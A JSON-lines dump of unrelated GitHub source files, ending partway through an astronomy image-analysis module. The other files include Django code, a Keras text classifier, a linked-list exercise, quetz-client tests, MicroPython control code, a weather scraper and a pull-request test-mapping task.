options={\n \"verbose_name\": \"链路中转机\",\n \"verbose_name_plural\": \"链路中转机\",\n },\n ),\n migrations.AddField(\n model_name=\"tasks\",\n name=\"cos_file_name\",\n field=models.CharField(blank=True, max_length=255, null=True, verbose_name=\"cos对象文件名称\"),\n ),\n migrations.AddField(\n model_name=\"tasks\",\n name=\"link_id\",\n field=models.IntegerField(blank=True, null=True, verbose_name=\"链路id\"),\n ),\n ]\n","repo_name":"TencentBlueKing/bk-log","sub_path":"apps/log_extract/migrations/0017_auto_20201111_1050.py","file_name":"0017_auto_20201111_1050.py","file_ext":"py","file_size_in_byte":3572,"program_lang":"python","lang":"en","doc_type":"code","stars":114,"dataset":"github-code","pt":"53"} +{"seq_id":"6767643155","text":"from django.http import JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom ..Packages.auth_api.PackageUpdate import add_package_update\nfrom ..DatabaseConnector import db_connection\n\nimport json\n\n##\n# Handels the product ID scan adds cureent location and time stamp info to the Database\n# #\n@csrf_exempt\ndef add_scan_info(request):\n conn=db_connection.get_connection()\n data=request.body.decode()\n code_dict=json.loads(data)\n print(code_dict)\n pkg_id=code_dict['pkg_id']\n longi=code_dict['longi']\n lati=code_dict['lati']\n ts=code_dict['ts']\n status= add_package_update.insert_product_tracking_info(conn, pkg_id, longi, lati, ts)\n return JsonResponse({'status': status})","repo_name":"batch11g6/SmartChain","sub_path":"SmartChain/RestAPI/RestAPI/API/UpdateProductScan/add_productscan_info.py","file_name":"add_productscan_info.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"521872041","text":"from tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import LSTM, Dense, Embedding, Dropout\nfrom sklearn.metrics import confusion_matrix, f1_score\n# 导入必要的库\nimport pandas as pd\nfrom util import *\nimport tensorflow as tf\n# 假设 read_data 返回的是DataFrame\ntrain_dataset = read_data('train.json')\n\n# 分词,并将分词结果存储在字典中\ntrain_tokenized_data = token_data(train_dataset.values)\n\n# 加载保存的Word2Vec模型\nloaded_model = Word2Vec.load(\"word2vec_model202311091711.model\")\n\n# 汉字通过word2vec数字化 Pad the feature vectors\nMAX_SEQUENCE_LENGTH = 250\n# 假设 padded_features_vector 是通过 get_features_vectors 获得的\npadded_features_vector = get_features_vectors(train_tokenized_data, loaded_model, MAX_SEQUENCE_LENGTH)\n\n# 将每个向量序列转换为列表,并确保它们保持原有顺序\nvector_list = [list(vector) for vector in padded_features_vector]\n\n# 创建一个包含所有向量的DataFrame\nvector_df = pd.DataFrame(vector_list)\n\n# 选取id和label_id列\nid_label_df = train_dataset[['id', 'label_id']]\n\n# 按顺序合并DataFrame\ncombined_df = pd.concat([id_label_df, vector_df], axis=1)\n\n# print(combined_df.shape)\n# print(combined_df.columns)\n# print(combined_df.head(1))# -----------------------------------\n\ntest_size=0.2\ntrain_set,test_set=split_dataset(combined_df,test_size=test_size)\n\n# 数据分割\nX_train,y_train, X_test, y_test =\\\n train_set.drop(['id', 'label_id'], axis=1),\\\n train_set['label_id'],\\\n test_set.drop(['id', 'label_id'], axis=1),\\\n test_set['label_id']\n\n\nprint('X_train',X_train.shape)\nprint('y_train',y_train.shape)\nprint('X_test',X_test.shape)\nprint('y_test',y_test.shape)\n\n# 假设 EMBEDDING_DIM 和 MAX_SEQUENCE_LENGTH 已经设置\nEMBEDDING_DIM = 300 # 根据Word2Vec模型的维度\nMAX_SEQUENCE_LENGTH = 250\n\n# Assuming your model is for sequence data and X_train, X_test are already feature vectors\nmodel = Sequential()\nmodel.add(LSTM(64, return_sequences=True, input_shape=(MAX_SEQUENCE_LENGTH, EMBEDDING_DIM)))\nmodel.add(Dropout(0.5))\nmodel.add(LSTM(32))\nmodel.add(Dense(36, activation='softmax')) # 36 classes\n\nmodel.compile(loss='sparse_categorical_crossentropy',\n optimizer='adam',\n metrics=['accuracy'])\n\nmodel.summary()\n\n# No need for list comprehension if X_train and X_test are already correct shape\nX_train_list = [np.concatenate(list(row)) for index, row in X_train.iterrows()]\nX_train_array = np.array(X_train, dtype='float32')\n# X_test_list = [np.concatenate(list(row)) for index, row in X_test.iterrows()]\n# X_test_array = np.array(X_test_list, dtype='float32')\n# X_train_array = X_train.to_numpy()\n# X_test_array = X_test.to_numpy()\n\n# Train the model\nmodel.fit(X_train, y_train, epochs=10, batch_size=32, validation_split=0.2)\n\n# Evaluate the model\nloss, accuracy = model.evaluate(X_test, y_test)\nprint(\"Accuracy: {:.2f}%\".format(accuracy * 100))\n\n# Predictions\ny_pred = model.predict(X_test)\ny_pred_labels = np.argmax(y_pred, axis=1)\n\n# Performance evaluation\naccuracy = f1_score(y_test, y_pred_labels, average='macro')\ncm = confusion_matrix(y_test, y_pred_labels)\nprint('F1 Score:', accuracy)\nprint('Confusion Matrix:\\n', cm)","repo_name":"funing230/competition20241109","sub_path":"1111.py","file_name":"1111.py","file_ext":"py","file_size_in_byte":3213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29236828492","text":"import sys\n\n#singly linked list\nclass Node:\n def __init__(self,val):\n self.val=val\n self.nxt=None\n\nclass LinkedList:\n def __init__(self,head=None):\n self.head=head\n\n #inserts value at tail of linked list\n def insertAtTail(self,data):\n node=Node(data)\n temp=self.head\n while temp.nxt is not None:\n temp=temp.nxt\n temp.nxt=node\n\n def removeDup(self):\n temp=self.head\n dictionary={}\n prev=None\n while temp is not None:\n #checks if key is in the dictionary\n if temp.val in dictionary:\n prev.nxt=temp.nxt\n #else, first occurrence so add to dictionary\n else:\n dictionary[temp.val]=None\n prev=temp\n temp=temp.nxt\n \n #finds the kth element from end of list\n def kth(self, k):\n if k<0:\n return None\n temp=self.head\n #move temp forward k spaces\n for i in range(k):\n if temp is None:\n print(\"no valid node exists\")\n return None\n temp=temp.nxt\n #could have exited for loop without reaching first error check\n #so must error check again\n if temp is None:\n print(\"no valid node exists\")\n return None\n elementToFind=self.head\n prev=None\n while temp.nxt is not None: \n temp=temp.nxt\n prev=elementToFind\n elementToFind=elementToFind.nxt\n print(\"the value found is %d\"%elementToFind.val)\n\n def size(self):\n temp=self.head\n size=0\n while temp is not None:\n size=size+1\n temp=temp.nxt\n print(\"size is %d\"%size)\n\nif __name__==\"__main__\":\n node = Node(2)\n ll=LinkedList(node) \n ll.insertAtTail(3)\n ll.insertAtTail(3)\n ll.insertAtTail(4)\n ll.insertAtTail(2)\n ll.kth(2)\n ll.size()\n","repo_name":"amyvalukonis/CrackingTheCodingInterview","sub_path":"CCI/2.2/kthElement.py","file_name":"kthElement.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4576856046","text":"import pytest\n\nfrom quetz_client.client import QuetzClient\n\nfrom .conftest import temporary_package_file\n\n\n@pytest.mark.parametrize(\n \"role\",\n [\n \"member\",\n \"maintainer\",\n \"owner\",\n ],\n)\ndef test_live_set_channel_member(\n live_client: QuetzClient,\n live_post_channel_a,\n role,\n):\n live_client.set_channel_member(\"alice\", role, \"a\")\n\n members = live_client.yield_channel_members(\"a\")\n\n assert any(m.user.username == \"alice\" and m.role == role for m in members)\n\n\ndef test_live_delete_channel_member(\n authed_session,\n live_client: QuetzClient,\n live_post_channel_a_members,\n):\n # Check that alice is a member of channel a\n channel = \"a\"\n username = \"alice\"\n\n response = authed_session.get(\n f\"{live_client.url}/api/channels/{channel}/members\",\n )\n assert {u[\"user\"][\"username\"] for u in response.json()} == {\"alice\", \"bob\"}\n\n live_client.delete_channel_member(username, channel)\n\n # Check that alice is no longer a member of channel a\n response = authed_session.get(\n f\"{live_client.url}/api/channels/{channel}/members\",\n )\n assert {u[\"user\"][\"username\"] for u in response.json()} == {\"bob\"}\n\n\ndef test_live_get_role(\n live_client: QuetzClient,\n live_alice_role,\n):\n actual_alice_role = live_client.get_role(\"alice\")\n assert next(actual_alice_role).role == live_alice_role\n\n\ndef test_live_post_file_to_channel(\n live_client: QuetzClient,\n live_post_channel_a,\n requests_mock,\n):\n # For some reason, we still need to explicitly tell requests_mock to\n # use the real http connection for this url.\n # I thought this would be avoided by using real_http=True in\n # live_client in conftest.py, but it's not.\n requests_mock.register_uri(\n \"GET\",\n \"https://conda.anaconda.org/conda-forge/linux-64/xtensor-0.16.1-0.tar.bz2\",\n real_http=True,\n )\n\n packages = live_client.yield_packages(\"a\")\n assert len(list(packages)) == 0\n\n with temporary_package_file() as file:\n live_client.post_file_to_channel(\"a\", file)\n\n packages = live_client.yield_packages(\"a\")\n\n assert any(p.name == \"xtensor\" for p in packages)\n","repo_name":"mamba-org/quetz-client","sub_path":"tests/test_live.py","file_name":"test_live.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"30441399835","text":"\r\n#from ulab import numpy as np\r\n\r\n#def tick(timer): # we will receive the timer object when being called\r\n# print(timer.counter()) # show current timer's counter value\r\n\r\n#tim = pyb.Timer(4, freq=1) # create a timer object using timer 4 - trigger at 1Hz\r\n#tim.callback(tick) \r\n\r\n# 0 = pyboard, 1 = teensy41\r\nnISR = 0\r\nN = 1000#<-- probably longer\r\nprint(\"N = %i\" % N)\r\n\r\nimport time\r\n\r\nfrom machine import Timer\r\nfrom machine import Pin\r\n\r\nsw_pin = Pin(40, mode=Pin.OUT)\r\nled = Pin(13, mode=Pin.OUT) # enable GP16 as output to drive the SW_PIN\r\nled.off()\r\n\r\np2 = Pin(21, mode=Pin.OUT)\r\np3 = Pin(22, mode=Pin.OUT)\r\np4 = Pin(23, mode=Pin.OUT)\r\n\r\n\r\nisr_state = 0 \r\nisr_happened = 0\r\n\r\ndef tick(timer): # we will receive the timer object when being called\r\n #print(timer.counter()) # show current timer's counter value\r\n #pyb.LED(2).toggle()\r\n global sw_pin, isr_happened, nISR\r\n if sw_pin.value():\r\n sw_pin.off()\r\n else:\r\n sw_pin.on()\r\n\r\n isr_happened = 1\r\n nISR += 1\r\n \r\n\r\ndef mysat(vin):\r\n if vin > 255:\r\n return 255\r\n elif vin < -255:\r\n return -255\r\n else:\r\n return vin\r\n\r\n# set up i2c\r\nfrom machine import I2C\r\n\r\ni2c = I2C(2, 400_000)\r\n\r\n# - pend uno address\r\n# - mega address\r\nmega_address = 0x07\r\nuno_address = 0x08\r\n\r\nfrom ulab import numpy as np\r\n\r\nimport upybd as pybd\r\n# create blocks\r\nu = pybd.pulse_input(amp=200, on_ind=10, off_ind=200)\r\nline_sense = pybd.i2c_sensor()\r\nencoder = pybd.i2c_sensor()\r\nv_nom = pybd.constant_input(amp=0)\r\nadd1 = pybd.addition_block()\r\nsub1 = pybd.subtraction_block()\r\nG = pybd.cart_pendulum_upy(line_sense, encoder, i2c, \\\r\n send_address=mega_address, \\\r\n read_address1=mega_address, \\\r\n read_address2=uno_address)\r\n# open-loop pulse test in a straightline (but with no sensor to drive\r\n# straight)\r\nadd1.set_input_block1(v_nom)\r\nadd1.set_input_block2(u)\r\n\r\nsub1.set_input_block1(v_nom)\r\nsub1.set_input_block2(u)\r\n\r\n\r\nG.set_input_block1(add1)\r\nG.set_input_block2(sub1)\r\n\r\n\r\nu.init_vectors(N)\r\nline_sense.init_vectors(N)\r\nencoder.init_vectors(N)\r\nG.init_vectors(N)\r\nadd1.init_vectors(N)\r\nsub1.init_vectors(N)\r\n\r\n\r\n\r\ni2c_send_array = bytearray([3,0,0,0,0])\r\ntwos_comp_offset = 2**16\r\n\r\n# check line calibration status and calibrate if necessary\r\ncal = G.check_cal()\r\nprint(\"cal: %i\" % cal)\r\n\r\nif cal == 0:\r\n # send calibration command over i2c\r\n G.send_cal_command()\r\n for i in range(20):\r\n time.sleep_ms(500)\r\n cal = G.check_cal()\r\n print(\"i = %i, cal = %i\" % (i, cal))\r\n if cal == 1:\r\n break\r\n\r\n\r\n#data = np.zeros((N,3),dtype=np.int16)\r\n#data = np.zeros((N,6),dtype=np.int16)\r\n\r\n\r\nKp = 2\r\nenc = 0\r\n\r\nnISR = 0\r\n\r\ntim = Timer(1, mode=Timer.PERIODIC, callback=tick, freq=500)\r\n\r\n\r\nt0 = time.ticks_us()\r\n\r\n# start test command here\r\nG.start_test()\r\n\r\n\r\nfor i in range(N):\r\n #pin_A15.on()\r\n while (isr_happened == 0):\r\n # wait for next interrupt\r\n time.sleep_us(10)\r\n #pin_A15.off()\r\n\r\n # square wave that toggles each time step\r\n if isr_state == 1:\r\n isr_state = 0\r\n p2.off()\r\n else:\r\n isr_state = 1\r\n p2.on()\r\n\r\n p3.on()\r\n # clear flag\r\n isr_happened = 0\r\n\r\n u.find_output(i)\r\n add1.find_output(i)\r\n sub1.find_output(i)\r\n G.send_commands(i)\r\n G.find_output(i)\r\n \r\n p3.off()\r\n\r\n\r\nt1 = time.ticks_us()\r\nloop_time = t1 - t0\r\nprint(\"loop_time = %s\" % loop_time)\r\n\r\n# weird stop approach\r\n\r\n# stop test command here\r\nG.stop_test()\r\n\r\ntim.deinit()\r\n\r\n\r\n## for row in data:\r\n## #print(\"%i, %i, %i\" % (row[0],row[1],row[2]))\r\n## row_str = \"\"\r\n## for i, elem in enumerate(row):\r\n## if i > 0:\r\n## row_str += \",\"\r\n## row_str += str(elem)\r\n## print(row_str)\r\n\r\n\r\n## n_echo = data[:,2]*256 + data[:,3]\r\n## dn = n_echo[1:] - n_echo[0:-1]\r\n## print(\"dn max = %i\" % np.max(dn))\r\n\r\n## for i, ent in enumerate(dn):\r\n## if ent != 1:\r\n## print(\"bad dn: %i, %i\" % (i, ent))\r\n\r\n","repo_name":"ryanGT/sabbatical_github","sub_path":"micropython/teensy_cart_pendulum_control/main_backup_manual/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71767500967","text":"import pandas as pd\nimport requests\nfrom bs4 import BeautifulSoup\n\npage = requests.get(\"https://forecast.weather.gov/MapClick.php?lat=34.099695000000054&lon=-118.33539999999999#.XpmUC2JR3tQ\")\nsoup = BeautifulSoup(page.content, \"html.parser\")\nweek = soup.find(id=\"seven-day-forecast-body\")\nitems = week.find_all(class_=\"tombstone-container\")\n# print(items[0])\n#\n# print(items[0].find(class_=\"period-name\").get_text())\n# print(items[0].find(class_=\"short-desc\").get_text())\n# print(items[0].find(class_=\"temp\").get_text())\n\nperiod_names = [item.find(class_=\"period-name\").get_text() for item in items]\nshort_desc = [item.find(class_=\"short-desc\").get_text() for item in items]\ntemp = [item.find(class_=\"temp\").get_text() for item in items]\n\nweather = pd.DataFrame(\n {\n \"period\": period_names,\n \"short_descriptions\": short_desc,\n \"temperatures\": temp,\n })\nprint(weather)\nweather.to_csv(\"weather.csv\")\n\n","repo_name":"yKuzmenko740/Web_Scraping_practice","sub_path":"web_practice.py","file_name":"web_practice.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34571259994","text":"from concurrent.futures import ThreadPoolExecutor\nfrom .commons import org, db\nimport functools\n\nfrom .models.schema import File, Test, HandledPull, TestCount, Repo\nfrom .app_init import app\n\ndef needs_app_context(f):\n @functools.wraps(f)\n def wrapper(*args, **kwargs):\n with app.app_context():\n return f(*args, **kwargs)\n\n return wrapper\n\nclass LearningTask(object):\n\n def __init__(self):\n self.executor = ThreadPoolExecutor(max_workers=1)\n self.future = None\n\n def load_pulls(self, repo_name, direction='desc', stop_on_handled=True):\n if self.future and self.future.running():\n return \"Error: The previous task is still running\"\n\n self.future = self.executor.submit(self._do_load_pulls, repo_name, direction, stop_on_handled)\n return \"Started task!\"\n\n @needs_app_context\n def _do_load_pulls(self, repo_name, direction, stop_on_handled):\n repo_id = self._get_repo_id_from_name(repo_name)\n repo = org.get_repo(repo_name)\n for pull in repo.get_pulls('all', direction=direction):\n if self._is_pull_handled(pull, repo_id):\n if stop_on_handled:\n break\n else:\n continue\n files = self._get_files(pull, repo_id)\n tests = self._get_tests(pull)\n self._count_tests_for_files(files, tests)\n\n def _get_tests(self, pull):\n test_set = set()\n for comment in pull.get_issue_comments():\n c = comment.body\n if c.startswith(\"test \") and c.endswith(\" please\"):\n c = c[5:-7]\n tests = c.replace(\",\", \"\").split()\n test_type = \"integration\"\n if \"cucumber\" in tests:\n test_type = \"cucumber\"\n for test_name in tests:\n if test_name not in [\"cucumber\", \"integration\"]:\n test = self._get_or_create_test(test_name, test_type)\n test_set.add(test)\n\n return test_set\n\n def _get_files(self, pull, repo_name):\n files_set = set()\n for f in pull.get_files():\n file = self._get_or_create_file(f._filename.value, repo_name)\n files_set.add(file)\n return files_set\n\n def _count_tests_for_files(self, files, tests):\n if len(files) == 0 or len(tests) == 0:\n return\n for f in files:\n for t in tests:\n test_count = db.session.query(TestCount).filter_by(file_id=f.id, test_id=t.id).first()\n if not test_count:\n test_count = TestCount(file_id=f.id, test_id=t.id, count=1)\n db.session.add(test_count)\n else:\n test_count.count = test_count.count + 1\n db.session.expire_on_commit = False\n db.session.commit()\n\n def _get_or_create_file(self, path, repo_id):\n file = db.session.query(File).filter_by(path=path, repo_id=repo_id).first()\n if not file:\n file = File(path=path, repo_id=repo_id)\n db.session.add(file)\n db.session.expire_on_commit = False\n db.session.commit()\n return file\n\n def _get_or_create_test(self, name, type):\n test = db.session.query(Test).filter_by(name=name, type=type).first()\n if not test:\n test = Test(name=name, type=type)\n db.session.add(test)\n db.session.expire_on_commit = False\n db.session.commit()\n return test\n\n def _is_pull_handled(self, pull, repo_id):\n handled_pull = db.session.query(HandledPull).filter_by(pull_id=pull.id, repo_id=repo_id).first()\n if not handled_pull:\n handled_pull = HandledPull(pull_id=pull.id, repo_id=repo_id)\n db.session.add(handled_pull)\n db.session.expire_on_commit = False\n db.session.commit()\n return False\n return True\n\n def _get_repo_id_from_name(self, repo_name):\n repo = db.session.query(Repo).filter_by(name=repo_name).first()\n if not repo:\n repo = Repo(name=repo_name)\n db.session.add(repo)\n db.session.expire_on_commit = False\n db.session.commit()\n return repo.id","repo_name":"Guy-Lev/Takalushk","sub_path":"app/learning_task.py","file_name":"learning_task.py","file_ext":"py","file_size_in_byte":4302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"856002317","text":"from __future__ import division, print_function\n\n## Import General Tools\nimport sys\nimport os\nimport re\nimport stat\nimport shutil\nimport datetime\nif sys.version_info.major == 2:\n import subprocess32 as subprocess\nelif sys.version_info.major == 3:\n import subprocess\nimport logging\nimport yaml\nimport math\nimport numpy as np\nimport pymongo\nfrom pymongo import MongoClient\n\n\n## Import Astronomy Specific Tools\nimport ephem\nimport astropy.units as u\nimport astropy.io.fits as fits\nimport astropy.coordinates as coords\nimport astropy.table as table\nimport astropy.wcs as wcs\nimport astropy.io.ascii as ascii\n\n\n__version__ = '1.5.2'\n\n\n##-----------------------------------------------------------------------------\n## Mode Function\n##-----------------------------------------------------------------------------\ndef mode(data, binsize):\n '''Function to calculate the mode of a distribution given the distribution\n and a binsize.\n \n Parameters\n ----------\n data : list\n list of values to be analyzed\n\n binsize : float\n size of the bins in to which the data will be sorted\n \n Returns\n -------\n (n, center) : tuple\n tuple containing the number of data points in the most common bin (n)\n and the central value of that bin (center)\n '''\n bmin = math.floor(min(data)/binsize)*binsize - binsize/2.\n bmax = math.ceil(max(data)/binsize)*binsize + binsize/2.\n bins = np.arange(bmin,bmax,binsize)\n hist, bins = np.histogram(data, bins=bins)\n centers = (bins[:-1] + bins[1:]) / 2\n foo = zip(hist, centers)\n return max(foo)[1]\n\n\nclass TelescopeConfigError(Exception):\n pass\n\n##-----------------------------------------------------------------------------\n## Define Telescope object to hold telescope information\n##-----------------------------------------------------------------------------\nclass Telescope(object):\n '''Object which contains information about the telescope which took the\n Image (see IQMon.Image object definition).\n \n Parameters\n ----------\n config_file : string\n Path to the configuration file to be read. The telescope properties are\n definied when a configuration file is read. The configuration file is a\n YAML formatted text file which can contain the following entries:\n\n name : string containing the name of the telescope\n\n logs_file_path : the path in to which log files will be written\n\n plot_file_path : the path in to which the plots (e.g. those from the\n image.make_PSF_plot() or image.make_zero_point_plot() methods) will\n be written.\n\n temp_file_path : the path used for temporary files created by the\n program\n\n mongo_address : string containing the address to connecto to the mongo\n server which, if used, will contain a database of image analysis\n results.\n\n mongo_port : integer containing the port number of the mongo server\n\n mongo_db : string containing the name of the mongo database to use\n\n mongo_collection : string containing the name of the mongo collection to\n use\n\n pixel_scale : float containing the pixel scale in arcseconds per pixel.\n If either the pixel_scale or both the focal_length and pixel_size\n are required to be in the configuration file.\n\n focal_length : interger containing the focal length of the telescope in\n mm. This is used in estimating the pixel scale prior to plate\n solving.\n\n pixel_size : float containing the size of a pixel in microns. This is\n used in estimating the pixel scale prior to plate solving.\n\n gain : float with the estimated gain (electroncs per ADU) of the\n detector. This value is used by source extractor. If it is not\n present a default value of 1.0 will be used.\n\n saturation : float with the saturation level of the detector in ADU.\n This is used in optionally marking saturated pixels in the jpegs\n made by the make_JPEG() method of the Image object.\n\n threshold_FWHM : float value (in units of pixels) with the threshold\n FWHM value. If the image FWHM is above this value, the FWHM flag\n will be set.\n\n threshold_pointing_err : float value (in units of arcmin) with the\n threshold pointing error. If the pointing error is above this\n value, the pointing error flag will be set.\n\n threshold_ellipticity : float value (unitless) with the threshold\n ellipticity. If the ellipticity is above this value, the\n ellipticity flag will be set.\n\n threshold_zeropoint : float value (in magnitudes) with the threshold\n zero point. If the zero point is above this value, the zero point\n flag will be set.\n\n units_for_FWHM : The units which will be used when displaying the FWHM\n value on the web page. Also often used by customized scripts for\n displaying IQMon results.\n\n ROI : string representing the region of interest in pixels which the\n image should be cropped to. Format is \"[x1:x2,y1:y2]\" where x1 is\n the minimum x pixel, x2 is the maximum x pixel, y1 is the minimum y\n pixel, and y2 is the maximum y pixel. All pixel values will be\n forced to integers.\n\n PSF_measurement_radius : Radius in pixels of central region for which\n the image quality measurements of stars are used in determining the\n image FWHM and ellipticity. This parameter allows the user to\n ignore the corners of the image if they wish to ignore the optical\n aberrations in that region.\n\n pointing_marker_size : Diameter (in arcminutes) of the pointing marker\n symbol on the image jpegs generated by the make_JPEG() method.\n\n SExtractor_params : Dictionary of source extractor parameters to be used\n when source extractor is called. For example, when you want to set\n the CATALOG_TYPE to FITS_LDAC, use {'CATALOG_TYPE': 'FITS_LDAC'}.\n\n SCAMP_params : Dictionary of SCAMP parameters to be used when SCAMP is\n called.\n\n catalog : Dictionary containing information about the stellar catalog\n which is matched to the detected stars to determine the zero point.\n The get_catalog() method will query Vizier using these parameters.\n \n name : The name of the catalog which will be passed to a\n astroquery.vizier.Vizier() instance.\n \n columns : List of the column names to retrieve. Defaults to\n ['_RAJ2000','_DEJ2000','UCAC4','Bmag','Vmag','gmag','rmag','imag']\n if the catalog is UCAC4.\n \n magmax : Maximum magnitude to retrieve.\n \n Remaining parameters are the dictionary which link the filter names\n in the fits header to the filter names in the Vizier catalog that is\n retrieved. For example, if I want to compare the source extractor\n catalog with the UCAC4 catalog limited to stars brighter than\n magnitude 15 and I want to compare the 'rmag' filter magnitudes from\n the catalog to my images which have the FILTER header keyword set to\n 'PSr', then I would have a configuration file which contains the\n following:\n\n catalog:\n name: 'UCAC4'\n magmax: 15.0\n PSr: 'rmag'\n '''\n def __init__(self, config_file):\n self.site = ephem.Observer()\n\n ## Read YAML Config File\n config_file = os.path.expanduser(config_file)\n if not os.path.exists(config_file):\n raise TelescopeConfigError('Configuration file {} not found'.format(config_file))\n with open(config_file, 'r') as yaml_string:\n config = yaml.load(yaml_string)\n if not isinstance(config, dict):\n raise TelescopeConfigError('Configuration file contents not parsed as dict')\n self.config = config\n\n ## Populate Configured Properties\n if 'name' in config.keys():\n self.name = str(config['name'])\n else:\n self.name = 'telescope'\n\n if 'temp_file_path' in config.keys():\n self.temp_file_path = os.path.expanduser(config['temp_file_path'])\n else:\n self.temp_file_path = os.path.join('/', 'tmp')\n\n if 'plot_file_path' in config.keys():\n self.plot_file_path = os.path.expanduser(config['plot_file_path'])\n else:\n self.plot_file_path = os.path.join('/', 'tmp')\n\n if 'logs_file_path' in config.keys():\n self.logs_file_path = os.path.expanduser(config['logs_file_path'])\n else:\n self.logs_file_path = os.path.join('/', 'tmp')\n\n if 'mongo_address' in config.keys():\n self.mongo_address = config['mongo_address']\n else:\n self.mongo_address = None\n\n if 'mongo_port' in config.keys():\n self.mongo_port = config['mongo_port']\n else:\n self.mongo_port = 27017 ## Use default mongo port\n\n if 'mongo_db' in config.keys():\n self.mongo_db = config['mongo_db']\n else:\n self.mongo_db = None\n\n if 'mongo_collection' in config.keys():\n self.mongo_collection = config['mongo_collection']\n else:\n self.mongo_collection = None\n\n ## Define astropy.units Equivalency for Arcseconds and Pixels\n self.pixel_scale_equivalency = [(u.pix, u.arcsec,\n lambda pix: (pix*u.radian.to(u.arcsec) * self.pixel_size\\\n / self.focal_length).decompose().value,\n lambda arcsec: (arcsec/u.radian.to(u.arcsec) * self.focal_length\\\n / self.pixel_size).decompose().value\n )]\n\n if not 'pixel_scale' in config.keys():\n if ('focal_length' in config.keys()) and ('pixel_size' in config.keys()):\n self.focal_length = config['focal_length'] * u.mm\n self.pixel_size = config['pixel_size'] * u.um\n self.pixel_scale = self.pixel_size.to(u.mm)\\\n /self.focal_length.to(u.mm)\\\n *u.radian.to(u.arcsec)*u.arcsec/u.pix\n else:\n raise TelescopeConfigError('Configuration file does not contain\\\n information to determine pixel_scale')\n else:\n self.focal_length = None\n self.pixel_size = None\n self.pixel_scale = config['pixel_scale'] * u.arcsec/u.pix\n\n if 'latitude' in config.keys():\n self.latitude = float(config['latitude']) * u.deg\n else:\n self.latitude = None\n\n if 'longitude' in config.keys():\n self.longitude = float(config['longitude']) * u.deg\n else:\n self.longitude = None\n\n if 'altitude' in config.keys():\n self.altitude = float(config['altitude']) * u.meter\n else:\n self.altitude = None\n\n if 'gain' in config.keys():\n self.gain = config['gain'] / u.adu\n else:\n self.gain = 1.0 / u.adu\n\n if 'saturation' in config.keys():\n self.saturation = config['saturation'] * u.adu\n else:\n self.saturation = None\n\n if 'threshold_FWHM' in config.keys():\n self.threshold_FWHM = config['threshold_FWHM'] * u.pix\n else:\n self.threshold_FWHM = None\n\n if 'threshold_pointing_err' in config.keys():\n self.threshold_pointing_err = config['threshold_pointing_err'] * u.arcmin\n else:\n self.threshold_pointing_err = None\n\n if 'threshold_ellipticity' in config.keys():\n self.threshold_ellipticity = config['threshold_ellipticity']\n else:\n self.threshold_ellipticity = None\n\n if 'threshold_zeropoint' in config.keys():\n self.threshold_zeropoint = config['threshold_zeropoint'] * u.mag\n else:\n self.threshold_zeropoint = None\n\n if 'units_for_FWHM' in config.keys():\n self.units_for_FWHM = getattr(u, config['units_for_FWHM'])\n else:\n self.units_for_FWHM = u.pix\n\n if 'ROI' in config.keys():\n self.ROI = str(config['ROI'])\n else:\n self.ROI = None\n\n if 'PSF_measurement_radius' in config.keys():\n self.PSF_measurement_radius = config['PSF_measurement_radius'] * u.pix\n else:\n self.PSF_measurement_radius = None\n\n if 'pointing_marker_size' in config.keys():\n self.pointing_marker_size = config['pointing_marker_size'] * u.arcmin\n else:\n self.pointing_marker_size = 1 * u.arcmin\n\n if 'SExtractor_params' in config.keys():\n self.SExtractor_params = config['SExtractor_params']\n else:\n self.SExtractor_params = None\n\n if 'SCAMP_params' in config.keys():\n self.SCAMP_params = config['SCAMP_params']\n else:\n self.SCAMP_params = None\n\n if 'catalog' in config.keys():\n self.catalog_info = config['catalog']\n else:\n self.catalog_info = None\n\n ## create paths\n paths_to_check = []\n paths_to_create = []\n if self.temp_file_path: paths_to_check.append(self.temp_file_path)\n if self.plot_file_path: paths_to_check.append(self.plot_file_path)\n if self.logs_file_path: paths_to_check.append(self.logs_file_path)\n for path in paths_to_check:\n# print('Checking: {}'.format(path))\n while not os.path.exists(path):\n# print('Need to create: {}'.format(path))\n paths_to_create.append(path)\n path = os.path.split(path)[0]\n while len(paths_to_create) > 0:\n new_path = paths_to_create.pop()\n# print('Creating: {}'.format(new_path))\n os.mkdir(new_path)\n\n\n def __del__(self):\n pass\n# print('Deleted telescope object')\n\n def __enter__(self):\n return self\n\n def __exit__(self ,type, value, traceback):\n self.__del__()\n\n\n##-----------------------------------------------------------------------------\n## Define Image object which holds information and methods for analysis\n##-----------------------------------------------------------------------------\nclass Image(object):\n '''Object which represents a single image to be analyzed. When defined, the\n image objects requires a filename to a valid image (.fits or .cr2) file.\n \n Input\n -----\n file : The path to the file to be analyzed.\n \n tel : An IQMon.Telescope object which describes the telescope which took\n the image.\n '''\n def __init__(self, file, tel):\n self.start_process_time = datetime.datetime.now()\n file = os.path.expanduser(file)\n if os.path.exists(file):\n file_directory, filename = os.path.split(file)\n self.raw_file = file\n self.raw_file_name = filename\n self.raw_file_directory = file_directory\n self.raw_file_basename, self.file_ext = os.path.splitext(filename)\n else:\n self.raw_file = None\n self.raw_file_name = None\n self.raw_file_directory = None\n raise IOError(\"File {0} does not exist\".format(file))\n ## Confirm that input tel is an IQMon.Telescope object\n assert isinstance(tel, Telescope)\n import copy\n self.tel = copy.deepcopy(tel)\n ## Initialize values to None\n self.logger = None\n self.working_file = None\n self.header = None\n self.exptime = None\n self.catalog_filter = None\n self.object_name = None\n self.image_WCS = None\n self.astrometry_solved = None\n self.coordinate_of_center_pixel = None\n self.coordinate_from_header = None\n self.n_stars_SExtracted = None\n self.SExtractor_background = None\n self.SExtractor_background_RMS = None\n self.temp_files = []\n self.SExtractor_catalogfile = 